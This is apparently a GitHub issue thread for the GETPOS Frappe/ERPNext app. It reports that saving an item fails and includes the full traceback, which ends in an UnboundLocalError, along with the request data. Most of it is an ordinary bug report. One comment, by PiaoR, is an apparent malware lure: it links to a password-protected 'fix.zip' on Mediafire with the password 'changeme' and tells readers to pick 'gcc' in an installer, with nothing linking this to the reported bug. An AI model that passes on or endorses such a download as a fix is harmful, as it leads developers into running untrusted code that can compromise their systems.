### ISSUE TITLE
Item Save Error

### ISSUE THREAD

**Issue by thida-bcn** [nestorbird/GETPOS#35]
1) Create Item
2) Choose Brand
3) Save
### App Versions
```
{
	"erpnext": "15.26.1",
	"frappe": "15.29.0",
	"getpos": "0.0.1",
	"hrms": "15.22.1",
	"insights": "2.2.4",
	"payments": "0.0.1",
	"webshop": "0.0.1"
}
```
### Route
```
Form/Item/F00001
```
### Traceback
```
Traceback (most recent call last):
  File "apps/frappe/frappe/app.py", line 115, in application
    response = frappe.api.handle(request)
  File "apps/frappe/frappe/api/__init__.py", line 49, in handle
    data = endpoint(**arguments)
  File "apps/frappe/frappe/api/v1.py", line 36, in handle_rpc_call
    return frappe.handler.handle()
  File "apps/frappe/frappe/handler.py", line 49, in handle
    data = execute_cmd(cmd)
  File "apps/frappe/frappe/handler.py", line 85, in execute_cmd
    return frappe.call(method, **frappe.form_dict)
  File "apps/frappe/frappe/__init__.py", line 1768, in call
    return fn(*args, **newargs)
  File "apps/frappe/frappe/utils/typing_validations.py", line 31, in wrapper
    return func(*args, **kwargs)
  File "apps/frappe/frappe/desk/form/save.py", line 39, in savedocs
    doc.save()
  File "apps/frappe/frappe/model/document.py", line 337, in save
    return self._save(*args, **kwargs)
  File "apps/frappe/frappe/model/document.py", line 390, in _save
    self.run_post_save_methods()
  File "apps/frappe/frappe/model/document.py", line 1145, in run_post_save_methods
    self.save_version()
  File "apps/frappe/frappe/model/document.py", line 1275, in save_version
    version.insert(ignore_permissions=True)
  File "apps/frappe/frappe/model/document.py", line 308, in insert
    self.run_method("after_insert")
  File "apps/frappe/frappe/model/document.py", line 962, in run_method
    out = Document.hook(fn)(self, *args, **kwargs)
  File "apps/frappe/frappe/model/document.py", line 1322, in composer
    return composed(self, method, *args, **kwargs)
  File "apps/frappe/frappe/model/document.py", line 1306, in runner
    add_to_return_value(self, f(self, method, *args, **kwargs))
  File "apps/getpos/getpos/getpos/hooks/version.py", line 13, in after_insert
    check_item(doc)
  File "apps/getpos/getpos/getpos/hooks/version.py", line 58, in check_item
    data = get_items(item_group = doc.get('item_group'), item_code=doc.name)
  File "apps/frappe/frappe/utils/typing_validations.py", line 31, in wrapper
    return func(*args, **kwargs)
  File "apps/getpos/getpos/custom_api/item_variant_api.py", line 150, in get_items
    item_stock["warehouse"] = item_dict.get("combo_items")[0].get("warehouse")
UnboundLocalError: local variable 'item_stock' referenced before assignment

```
### Request Data
```
{
	"type": "POST",
	"args": {
		"doc": "{\"name\":\"F00001\",\"owner\":\"Administrator\",\"creation\":\"2024-08-27 20:12:14.186606\",\"modified\":\"2024-08-27 20:12:14.186606\",\"modified_by\":\"Administrator\",\"docstatus\":0,\"idx\":2,\"naming_series\":\"STO-ITEM-.YYYY.-\",\"item_code\":\"F00001\",\"item_name\":\"Fried Noodles\",\"item_group\":\"Foods\",\"is_nil_exempt\":0,\"is_non_gst\":0,\"stock_uom\":\"Nos\",\"custom_estimated_time\":0,\"disabled\":0,\"allow_alternative_item\":0,\"is_stock_item\":0,\"has_variants\":0,\"include_item_in_manufacturing\":0,\"opening_stock\":0,\"valuation_rate\":0,\"standard_rate\":0,\"is_fixed_asset\":0,\"auto_create_assets\":0,\"is_grouped_asset\":0,\"over_delivery_receipt_allowance\":0,\"over_billing_allowance\":0,\"description\":\"Fried Noodles\",\"shelf_life_in_days\":0,\"end_of_life\":\"2099-12-31\",\"default_material_request_type\":\"Purchase\",\"valuation_method\":\"\",\"weight_per_unit\":0,\"allow_negative_stock\":0,\"has_batch_no\":0,\"create_new_batch\":0,\"has_expiry_date\":0,\"retain_sample\":0,\"sample_quantity\":0,\"has_serial_no\":0,\"variant_based_on\":\"Item Attribute\",\"enable_deferred_expense\":0,\"no_of_months_exp\":0,\"enable_deferred_revenue\":0,\"no_of_months\":0,\"min_order_qty\":0,\"safety_stock\":0,\"is_purchase_item\":1,\"lead_time_days\":0,\"last_purchase_rate\":0,\"is_customer_provided_item\":0,\"delivered_by_supplier\":0,\"country_of_origin\":\"United States\",\"grant_commission\":1,\"is_sales_item\":1,\"max_discount\":0,\"is_ineligible_for_itc\":0,\"inspection_required_before_purchase\":0,\"inspection_required_before_delivery\":0,\"is_sub_contracted_item\":0,\"customer_code\":\"\",\"published_in_website\":0,\"total_projected_qty\":0,\"custom_kiosk\":0,\"custom_pos\":0,\"custom_web\":0,\"doctype\":\"Item\",\"supplier_items\":[],\"incldues_item_group\":[],\"attributes\":[],\"customer_items\":[],\"item_defaults\":[],\"barcodes\":[],\"reorder_levels\":[],\"hub_managers\":[],\"custom_cost_center_details\":[],\"taxes\":[],\"custom_allergens\":[],\"custom_related_items\":[],\"uoms\":[{\"name\":\"1fiejpguj2\",\"owner\":\"Administrator\",\"creation\":\"2024-08-27 20:12:14.248903\",\"modified\":\"2024-08-27 20:12:14.248903\",\"modified_by\":\"Administrator\",\"docstatus\":0,\"idx\":1,\"uom\":\"Nos\",\"conversion_factor\":1,\"parent\":\"F00001\",\"parentfield\":\"uoms\",\"parenttype\":\"Item\",\"doctype\":\"UOM Conversion Detail\"}],\"__onload\":{\"stock_exists\":0,\"asset_naming_series\":\"ACC-ASS-.YYYY.-\"},\"__last_sync_on\":\"2024-08-28T04:05:32.201Z\",\"brand\":\"RayBan\",\"__unsaved\":1}",
		"action": "Save"
	},
	"btn": {
		"jQuery370046621113920818471": {
			"events": {
				"click": [
					{
						"type": "click",
						"origType": "click",
						"guid": 18394,
						"namespace": ""
					}
				]
			}
		}
	},
	"freeze": true,
	"headers": {},
	"error_handlers": {},
	"url": "/api/method/frappe.desk.form.save.savedocs",
	"request_id": "e1c87273-9d5f-4645-9afb-98dbd1027c0e"
}
```
### Response Data
```
{
	"exception": "UnboundLocalError: local variable 'item_stock' referenced before assignment",
	"exc_type": "UnboundLocalError",
	"_exc_source": "getpos (app)"
}
```

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ssinghnb** [comment]
Let me check.
